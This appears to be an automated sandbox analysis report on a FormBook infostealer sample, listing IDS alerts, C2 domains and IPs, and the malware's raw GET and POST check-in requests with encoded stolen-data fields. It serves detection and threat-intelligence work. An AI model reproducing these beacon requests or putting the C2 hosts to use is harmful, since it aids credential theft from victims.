Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50024 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50027 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50036 -> 31.31.198.204:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50035 -> 109.206.161.72:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49998 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50004 -> 69.57.163.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49937 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50003 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50037 -> 31.31.198.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50030 -> 217.160.0.24:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49849 -> 44.230.85.241:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50013 -> 202.79.161.151:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50026 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50029 -> 217.160.0.24:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50023 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50034 -> 109.206.161.72:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50007 -> 69.57.163.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50033 -> 109.206.161.72:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50009 -> 45.199.72.207:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50028 -> 217.160.0.24:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50008 -> 45.199.72.207:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50019 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50039 -> 31.31.198.204:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50025 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50038 -> 31.31.198.204:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.dogeeditor.xyz
Source:	DNS query: www.zkplant.xyz
Source:	DNS query: www.031233926.xyz
Source:	DNS query: www.gnolls.xyz
Source:	DNS query: www.bitsensor.xyz
Source:	DNS query: www.camgirlsporn.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: FORTRESSITXUS FORTRESSITXUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,

0_2_004422FE

Source: global traffic	HTTP traffic detected: GET /wcsd/?2XP=amgjwzLKl6rEa8KcvgLQhVFZy0/PkB580SdnIsCyOcuFvS7IMtp1400JOC3sJQSr6nCLw3mHnLgE5vWAWCOirLbgrbjRb9mLvMr37QB3ZOcGg0x5sSyoXv3/U94HPJ2fug==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.autoabmeldung.netUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /aani/?2XP=sQkeEtH9OtiK/t6Bj9erGhLsTKpuN/MDUNWcM4QfhhRoQU8g3L+c6GMn9k4SR6K/c56q+d9s6CSARjzAFJBzoeyM9TNSgH7XPTO+3gHGtUFhvSkBeoW4/dOX8FbAtn3E8g==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.dogeeditor.xyzUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /da4m/?2XP=Ux6pyOshW+D+BNR4hdFCMLKf9xd+p835MFJvzGKkDWtIenLvS6vkerP6Ciyhc6DIWYhj/2e9IXXxsY+aYdAORgIYVxfl1xbnmshDv/MJpci9V093E+res8H1UqlTE+YG5A==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.zkplant.xyzUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /9s8f/?2XP=rPoWipqBEt+tXlFHhYWrWJIqt6KAaVGouM7a4GzSwplbdKIfmYKtuQ1l/XLbw5K/FrvYNgpoKiQQ+D/Luro6D0LWD6wMdw0loLWVCk6cqr12aS/KTXBQgeGXZ5LBg0h1ow==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.spinco.newsUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /816c/?2XP=W4ykJO6Hrsfk3eiW6hbUXuTDEwwmF9jaSfNCeLIY3qv2DRY0zlvQcfGRTcQIx9w//Ksmoo3bODmBUiIUkKJSumsg/67nkRUYeMR8hUHEbLExcwLZHyovkovtzIjUgLKiWQ==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.031233926.xyzUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /4wrd/?2XP=zvKQydsYet0YZ/OwHUWmq4yM9JTvtXUGO+vSl4I9/hsgTphI60QS4NLtL/SsKNQWl5uxRSqNPmhBXphWWBxXa7xUqXlLc8mZsxitFspjWED+SuyrzphrYycMOhblNUuq/g==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.tumbetgirislinki.fitUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /r39j/?2XP=nAuLcQVxRpQyftZv84CivQF2Qtdl4Gz3pkJ72/H/i+YR1JkMGtJ4Rxj9bRAnpU29A4v0i/X4hzuoBL6ViNQzPoaWKRPrbVn9gGVyRu8R0AvahiZxMzR8/y9Zw7dEe5P19w==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.gnolls.xyzUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /sgcu/?2XP=nUsuXKyFkpr9+tZqu+jYPauE6+yousah+eGypeL++5OyoVkkRnAKKH0nC51jTYyulZbknA83EXul2Lluir26fbK2BI7pqV0+XIzpN0VDxVwPAkMmwU8snDPI1FRXgdginA==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.primeibes.liveUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /u8w1/?2XP=du57XDWj4k7jiWaDl6zJXNXNrVebZQBI5TjNg/Z6aNR4mILbnCGoYEN99jiSOCtlAdRHLOHlUcF3cXiWevycJmFZZdM4AcuDaCHWaCKkpHwXoI6GuI6QphKmcIyNyQxGNw==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.banjia0731.icuUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /os8u/?2XP=3cg4jovgjVgqZddVbv+Q/vs1yCQLnShSJgCm6VsQ+CsPkeyaaol2tFh0nTPSB5pJFzpYPnRkAHrmbmk+RX4XUP7+/7e/xcg+j2wx6gNzT2v3dsT1/NHgkv63k8SJtdI11Q==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.laohuc58.netUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /rmtd/?Wx=0xitNps&2XP=4b41uzX/MZJmLBS2VgiN3d1Xwj3PTj3aawaf8AD6zUW8m+YNQ/MLwNbv/pfLE1ZmG0c7f5c3IDyKnkIFdvBdaWqM8DZl7MTdOp9p+nDa4SDm/2NyduzSe8OMB1mykzigrQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.translatsolutions.proUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /qr1m/?2XP=V3X7l9gUFSglHYBp2+nxR1lADBbwA91VNPOby+DnnbnnYmEupdVVd5ZEwqTjUIGEIVxP3jDsvEJdfrGsfpcTiTGcP7eR/rPD1rOEsaYoyn5l5CKdlXOWcQJrcE2sDltQ5g==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.adventurerepair24.liveUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /vfsm/?Wx=0xitNps&2XP=AM9kVKYVn+ZeAoQEfLijsvYeieCVIy2G7lWPQSw0b3pBjd+YXa2V3glzK94+X8PECqzfZnCE4JNSrPMSnyH+SOy/8Wzf3AGNJsHM0XXFab6kWDsUGitdsrpWh6RO2gZ+4w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.bitsensor.xyzUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16
Source: global traffic	HTTP traffic detected: GET /ihyj/?2XP=pUa6oI2Rt83f76X8tAoAaPnbl1fBSiXlq/nDEOySaDDttRbDEBU4AtstIjQUsWsQ4M/3dpdjMbNPi3BIX58TGc1rwjuQSkG0Cuf6csaqtuXsIVi7mWtKcnBWtdsGV9JX9w==&Wx=0xitNps HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeHost: www.birbacher.onlineUser-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16

Source: global traffic	DNS traffic detected: DNS query: www.autoabmeldung.net
Source: global traffic	DNS traffic detected: DNS query: www.dogeeditor.xyz
Source: global traffic	DNS traffic detected: DNS query: www.zkplant.xyz
Source: global traffic	DNS traffic detected: DNS query: www.spinco.news
Source: global traffic	DNS traffic detected: DNS query: www.031233926.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tumbetgirislinki.fit
Source: global traffic	DNS traffic detected: DNS query: www.gnolls.xyz
Source: global traffic	DNS traffic detected: DNS query: www.primeibes.live
Source: global traffic	DNS traffic detected: DNS query: www.banjia0731.icu
Source: global traffic	DNS traffic detected: DNS query: www.laohuc58.net
Source: global traffic	DNS traffic detected: DNS query: www.translatsolutions.pro
Source: global traffic	DNS traffic detected: DNS query: www.adventurerepair24.live
Source: global traffic	DNS traffic detected: DNS query: www.bitsensor.xyz
Source: global traffic	DNS traffic detected: DNS query: www.birbacher.online
Source: global traffic	DNS traffic detected: DNS query: www.camgirlsporn.xyz
Source: global traffic	DNS traffic detected: DNS query: www.gr-realty.online

Source: unknown

HTTP traffic detected: POST /aani/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 204Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.dogeeditor.xyzOrigin: http://www.dogeeditor.xyzReferer: http://www.dogeeditor.xyz/aani/User-Agent: Opera/9.80 (Android; Opera Mini/7.5.32193/37.6488; U; en) Presto/2.12.423 Version/12.16Data Raw: 32 58 50 3d 68 53 4d 2b 48 64 7a 2b 46 76 43 6c 2b 4e 50 58 73 63 71 30 4c 31 53 67 63 5a 70 30 63 39 6f 76 63 4e 65 53 58 4a 64 32 32 77 45 5a 56 68 59 31 2b 4b 4c 61 6b 41 34 37 36 6c 4a 4f 5a 74 6e 45 63 4a 65 74 2f 74 67 76 33 57 61 36 51 56 58 4f 47 4f 49 6c 34 70 61 51 38 44 46 6f 30 79 32 4b 49 53 4b 5a 33 31 72 37 6f 48 6b 64 34 47 45 75 56 70 2b 76 73 76 44 79 79 55 4f 62 6e 6c 79 74 2b 55 70 42 6e 4e 62 50 6d 56 69 4c 38 4b 75 6a 53 54 2b 63 6a 4a 2b 4d 6a 41 37 42 79 37 34 6c 35 43 62 74 76 4b 30 41 46 36 33 72 48 43 42 70 52 45 4a 44 38 4a 38 34 43 32 4f 34 6e 32 36 6f 31 4b 73 2f 58 4c 4d 3d Data Ascii: 2XP=hSM+Hdz+FvCl+NPXscq0L1SgcZp0c9ovcNeSXJd22wEZVhY1+KLakA476lJOZtnEcJet/tgv3Wa6QVXOGOIl4paQ8DFo0y2KISKZ31r7oHkd4GEuVp+vsvDyyUObnlyt+UpBnNbPmViL8KujST+cjJ+MjA7By74l5CbtvK0AF63rHCBpREJD8J84C2O4n26o1Ks/XLM=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:35:01 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VaFZYNE7RXbWkwoisgR9q17WrDfqJJ2tSCkD%2F%2BiFbYkITbotNM4LcC7pyE5wS%2FzJsu0XwR7%2F%2BO8roi%2Bzf6xeOFF3jGlwGpo%2BXh32obn4kplM7yqM1IonlklHucydiKLam%2FOdAf02W%2FqI%2FXE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc76e19757520-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=66959&min_rtt=66959&rtt_var=33479&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 77 a3 48 96 7e af 5f a1 71 9f 99 e9 3e a4 93 7d 73 d9 39 03 08 09 24 81 00 09 49 e8 a5 4e 00 c1 22 56 b1 4b 73 fa 07 cd df 98 5f 36 47 b6 33 cb 69 4b 59 59 dd f3 30 f1 60 11 11 f7 de b8 71 97 ef e2 08 7e f9 e5 97 c7 7f 19 2f a5 b5 63 c8 a3 a8 c9 d2 2f bf 3c be fc 8c 46 a3 d1 63 04 81 ff fa 98 c1 06 8c a2 a6 29 ef e1 b1 8d bb a7 3b a9 c8 1b 98 37 f7 cd a9 84 77 23 ef a5 f7 74 d7 c0 a1 41 2f 22 7e 1d 79 11 a8 6a d8 3c b5 4d 70 cf dd dd 94 03 bc 08 de 5f f8 ab 22 7d 23 28 2f ee bd cb d4 4d 46 a3 02 61 06 fe 0c 87 3c 94 71 05 eb 37 2c d8 77 b4 39 c8 e0 d3 5d 17 c3 be 2c aa e6 0d 59 1f fb 4d f4 e4 c3 2e f6 e0 fd 73 e7 d3 28 ce e3 26 06 e9 7d ed 81 14 3e e1 9f bf 89 6a e2 26 85 5f 28 8c 1a e9 45 33 9a 14 6d ee 3f a2 2f 83 2f 04 75 73 4a e1 e8 62 